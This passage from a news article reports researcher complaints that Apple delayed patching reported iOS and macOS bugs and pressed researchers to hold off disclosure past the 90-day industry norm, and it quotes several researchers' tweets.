    Not only did Apple fail to have a patch ready after more than four months, but the company also tried to delay the researcher from publishing his findings until next spring, almost a full year after the original bug report, and well past the standard 90-day vulnerability disclosure deadline that is broadly accepted in the infosec industry.
    Situations like the one Wylecial had to face are becoming increasingly common among iOS and macOS bug hunters these days.
    Apple — despite announcing a dedicated bug bounty program — is increasingly being accused of delaying bug fixes on purpose and trying to silence security researchers.
    For example, when Wylecial disclosed his bug earlier today, other researchers reported similar situations where Apple delayed patching security bugs they reported for more than a year.

    For two of my bugs they’ve told me the same thing, that it will be fixed in “Fall of 2020”, and yesterday I asked for the update. They replied it’s not a bug 😅
    — Nikhil Mittal (@c0d3G33k) August 24, 2020

    When, in July, Apple announced the rules of the Security Research Device program, Google’s vaunted Project Zero security team declined to participate, claiming that the program rules were specifically written to limit public disclosure and muzzle security researchers about their findings.
    Three months before, in April, another security researcher also reported a similar experience with Apple’s bug bounty program, calling it “a joke” and saying its goal was to “keep researchers quiet about bugs for as long as possible.”

    The industry standard for disclosure of security issues is 90 days. We’re well beyond that point now. Why should I not publish?
    — Jeff Johnson (@lapcatsoftware) April 21, 2020

    An Apple spokesperson acknowledged our request for comment earlier today but said the company wouldn’t be able to comment, as it needed to investigate further.